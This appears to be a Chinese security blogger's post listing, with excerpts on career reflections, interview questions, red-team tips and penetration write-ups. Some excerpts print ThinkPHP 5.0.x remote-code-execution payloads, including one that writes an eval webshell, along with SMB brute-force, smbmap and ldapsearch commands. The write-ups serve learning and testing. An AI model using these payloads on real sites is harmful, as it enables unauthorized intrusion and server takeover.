- 博客(22)
- 收藏
- 关注
原创 2021年度总结与2022新的展望
2020年和2021年这2年,是我很难忘的2年,今年接触了太多新的事物,什么都是第一次,嘿嘿嘿,去年学的新东西,就是纯技术,今年学的新东西,学了很多认知型的东西,此外,也是自己的专业大方向转变的一个过程,还是老规矩,先感谢一下2021年帮助我的人吧,ax的老师傅们,今年3月份走的时候,我还记得谢总看我的眼神,哈哈哈哈,真的很感谢谢总,后面就去杭州啦,感谢新的大哥,马哥,才去就带我自费去团建,我直接么么哒,谢谢我的mentor墙哥,认识了阿里src司令榜的zhangfei大哥,认识ax吴总的色色的dongya
2022-01-14 15:35:15 262
原创 大厂面试(安全岗)
这些是今年3-9月份各个大厂问我的一些问题,这里给出了我的一些解决方案,包括阿里,腾讯,字节,美团问道的一些问题,当然有一些问题我没有给出答案(涉及到自己的一些技巧),也有一些常规问题没有罗列,比如自我介绍,项目经验,还有根据你的简历问的东西我就没有罗列出来,以及一些非常简单的问题我也没有罗列出来,比如sqlmap --os-shell原理是啥,ok1.shiro反序列化shiro550(命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值)
2021-09-12 19:22:56 491 1
原创 红队小技巧
原文链接:(我直接粘贴过来没有图片)https://xz.aliyun.com/t/9773前言有一段时间没有写文章了,也不知写什么,毕竟从攻击方换成防守方,乙方换到甲方,还有些许不适应。。。但还是决定把自己接触渗透所积累的东西也拿出分享,不管糟粕,还是大伙觉得我分享的有用(那阿鑫自然是很开心),希望能帮到还在学习路上的朋友,文章若有错误,请及时联系我指出,我也不想误导才学习的朋友。此外,本文为口嗨文,基本在说思路,没有实操。web端(1)信息收集收集cms信息:1.通过云溪,wapplayz
2021-07-12 21:40:25 713
原创 网络安全,渗透,小白入门养成计划
之所以写这篇文章呢,是觉得大时代的发展,我们这个专业越来越受到重视了,所以,阿鑫也想以自己的一些拙见,能帮到想入门的朋友1.关于网上的培训如果你想快速获得知识,培训无疑是最快最有效的捷径,但是我不建议大家去,第一.讲的东西很肤浅,自学很快的。第二.价格很高.第三.讲师讲的终是他的理解,你无法有自己学的那么深刻,导致后面学的东西无法迭代已经适应新的东西,人话总结,不管是web,还是内网,还是代码审计,ctf,都他妈不要去培训。2.自学这是很难的,你才入门一个方向,什么都不知道,什么都想学,但是又不知道
2021-07-12 21:33:21 502
原创 c++学习————VC报错解决方案(vc2013)
相信许多才学习c++的伙伴们,跟阿鑫一样才开始学习会遇见各种各样的奇葩问题,阿鑫会在这里总结,此篇文章会持续更新环境,vs2013 updata5 professional windows7一.vs2013无法打开包括文件: “SDKDDKVer.h”1.首先打开属性2.将次目录放入包含目录,我们的更具自己的安装目录来决定C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Include应用即可或者, 项目–右键–属性–配置属性–常规
2021-03-06 12:09:16 899
原创 一次曲折的TP
还是老规矩,进来直接用exp将phpinfo打出来(tp的版本为5.0.13)但是我们用常规的日志包含,却找不到我们的日志在哪里.后面才知道,我们get去请求也是无法请求到的,因为日志不在网站的绝对路径,只能通过post去fuzzing日志此时用session去包含,不行,因为session过期过的很快,所以一直拿不下来,后面问了公司的表哥才知道,这种情况可以用session的文件竞争来绕过,将其拿下。其他常规的exp,file_put_content wget这些,都是打不进去的,这个时候我
2021-01-01 15:31:58 202
原创 2020年度总结与2021新的展望
2020这一年,阿鑫真的成长了很多很多,2020年1月1日,刚刚大二3个月,什么也不会,20多天前的安洵杯15个名额我和黑匣子还有caps拿了12名,那个时候真的很自闭,1月8日放了寒假,就自己学习内网和看先知的文章,随后疫情来了,就开始网课,站在我自己的角度,我觉得疫情给我带了最大的收益就是学校没有开课,上网课,终于告别了一群傻逼老师什么都不交,还要让我们去听课,我终于有时间在课堂上学自己的东西,从1月份到5月份,就自己搭域环境,看先知的文章,自己做笔记,写文章到了5月末,就抱着尝试的心情去投了3家公司的
2021-01-01 15:03:32 890 2
原创 记一次域渗透2
朋友拿下了一个webshell,想打打内网,但是无奈进不去,特此帮兄弟看看,这里也记录一下吧。先看杀软,此机器没有杀软.然后在看有没有域,没有域.然后我们就去抓密码,可能存在一种情况,就是本地的administrator的密码,可能是域管的密码。但是在这台机器上,我们并没有抓到administrator的密码这个时候就有两种思路。1.机器能出网,直接上cs。抓到本地管理的密码,横向撞一波,然后上去,抓一波密码,如果有域账号,就用域账号去装域机器,抓域管的账号密码。抓到大体上渗透就借宿。如果没有抓
2020-12-19 15:17:49 289 2
原创 浅谈内网信息收集
1.密码策略收集1.net accounts /domain 如果是域用户,用命令查看 (域内)2.运用kali的ldapsearch来收集 (域外) dapsearch -x -H ldap://192.168.1.1:389 -D “CN=testa,CN=Users,DC=test,DC=com” -w DomainUser123! -b “DC=test,DC=com” | grep replUpToDateVector -A 13 ps
2020-12-19 14:54:42 635
原创 关于kali的一些小工具
基于端口攻击的攻击基于smb的攻击1.acccheckacccheck -t 192.168.1.1 -u root -p root -v //基础语法参数: -t/T 目标地址/批量字典 -p/P 密码/密码字典 -u/U 账号/账号字典2.smbmap(smb信息收集器)smbmap -H 192.168.1.1 //收集smb共享的信息smbmap -H 192.168.1.1 -u anonymous //匿名登录smbm
2020-12-11 23:22:08 1744
原创 爬取cnvd资料
首先这个网站存在反爬机制,第二,这个是以post的形式传入的,爬取这2点都有难度我这里直接贴代码,有注释import requestsimport xlwtfrom lxml import etreeimport refrom fake_useragent import UserAgentua = UserAgent()url='https://www.cnvd.org.cn/flaw/list.htm?flag=true'headers = { "User-Agent":
2020-10-09 12:01:16 1295 7
原创 记一次tp5.0.9RCE
目标常规报错直接说版本tp5.0.9,然后尝试payload_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo打出phpinfo顺便看了哈disable_function基本执行命令的payload都被禁了还好payload多,直接拿下s=file_put_contents(‘dd.php’,’<?php @eval($_POST[1]);’)&_method=__
2020-09-21 17:46:39 365
原创 hw小技巧
小弟也第一次参加hw,经过5天hw,确实也学到了许多的东西,但就本次分享而言,我分享一些我认为在hw里面值得注意的东西以及一些小技巧一.信息收集信息收集这个多西当然都是老生常谈了,你收集的东西越多,能打的方向也就越多,当然,hw给你打的资源的格式一般为单位名称,系统名称,域名,IP地址。当然,其他的资源可能都大同小异。网上都有很多信息收集的东西,都是那一套,扫端口,找子域名,看站有没有泄露什么东西,什么敏感文件,看网站的框架。现在,我就先给大家梳理一下。信息收集的本质有2个,一是把现有的资源扩大,能
2020-09-09 22:49:47 1782 1
原创 记一次tp5.0.11rce
记一次tp5.0.11rce今天很有感触,我决定从今天开始记录我在ax的点点滴滴,自己的学长都是一步一个脚印走出来,加油,阿鑫。首先进入网站,xxxx/ 随便输入xxx/admin 然后报错然后去网上搜索tp5.0.11的exp打,然后找了一个exp,这tm不直接渗透结束?然后看了一下函数,禁止了system,assert函数这里再附上几个exp,如果没有禁,可以直接打,_method=__construct&filter[]=system&method=get
2020-08-22 17:15:33 551
原创 基于python批量获取Url
当我们想批量找注入的时候,这是就会想到某些批量Url获取的软件,但是可能存在后门,有时又因为玄学问题不运行,这不扯吗,于是,就干脆自己写一个脚本,批量获取百度的url代码如下# -*- coding: utf-8 -*from lxml import etreeimport requestsimport timeimport reimport urllib.requestDOMAIN = "https://www.baidu.com/s?wd="a = input('请输入url:')b
2020-08-02 13:18:48 1551
原创 MSF的利用
其实MSF大部分都用来用ms17_010,其实MSF还有很多功能,比如用他来打打CMS的exp呀,还有对端口的攻击,生成payload,在此,我也记一个笔记,供大家分享。1.首先基于MSF的资产收集网络主机收集:use auxiliary/scanner/discovery/udp_probeuse auxiliary/scanner/discovery/udp_sweepuse au...
2020-04-18 15:53:37 984
原创 sql注入杂谈(三)--盲注
再讲文章之前,先说说,文章里面被标红的字段,是加了反引号的,(因为被csdn和谐了)还有*号也被和谐了,我是用的※来代替前面2章已经讲过了union select 以及报错注入的语法以及简单的绕狗方法,现在我来谈谈我对于盲注的看法,网上把盲注的种类分了几种,我在这里就不分了,我就把我自己目前掌握的方法都记录下来,绕狗的一些心得。顺带一提,其实我的盲注其实是很菜的,但是盲注确是很厉害的,因为能un...
2020-03-19 15:52:14 239
原创 sql注入杂谈(二)--报错注入
再讲文章之前,先说说,文章里面被标红的字段,是加了反引号的,(因为被csdn和谐了)还有*号也被和谐了,我是用的※来代替。其实报错注入是很强的,网上也有很多讲报错注入的,语法都有,但是很少有人讲解报错注入的绕waf,所以今天我小试牛刀,讲讲我自己的见解我就基于我自己的见解分享一下我自己的报错注入绕过,let’s go我们还是基于less-1来说,首先是第一条语句(extractvalue)...
2020-03-19 14:03:47 222
原创 sql注入杂谈(一)--union select
我就简单说说我对于联合注入的想法,以及对于联合注入绕过防火墙的方法,(只是我自己目前所掌握的方法,当然更多奇淫技巧还的需要我们自己去发掘)对于我们才学习安全的人来说,对于练习sql注入,我们学习最简单的语法就是sql注入之联合注入。就拿sqli-labs来说说吧127.0.0.1/less-1/?id=1我们的教程里面就说127.0.0.1/less-1/?id=1’ 加上单引号,看爆不爆错,...
2020-03-19 11:35:13 1507
原创 SQLMAP怎么拿shell
#前言首先,这篇文章只针对于渗透某单一网站,来如何利用sqlmap。如果有个别大牛是单单的挖SRC,那么手注的效率是高于sqlmap的。此外,这也是我自己的一个心得,如有不同的意见,欢迎大家进行交流学习。此外,在开篇之前,我也讲讲一些加快注入的方法,比如进入一个网站,你可以看见他的语言,然后大致判断出数据库的,或者用一些网站指纹和插件来判断,这样,在注入的时候可以–dbms = mysql,这...
2020-03-04 20:25:46 6580 4
原创 对指定网站渗透的一些总结
我是一名大二的学生,之前也没有网络安全的经验,现在才刚刚入门,所以,我就简单的把我自己一些外网的经验写下来,当然,大部分还是网上大牛的知识,我只是简单的总结与提炼了一下。首先,进入目标网站,我们的第一件事情就是信息收集,查看该网站的banner信息,我推荐的插件当然是Wappalyzer这个插件,很好用的,此外就是云悉指纹了解这些以后对我们后续的渗透有很大的帮助,这样能够更有针对性的渗透网...
2020-02-25 17:53:33 2484 4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人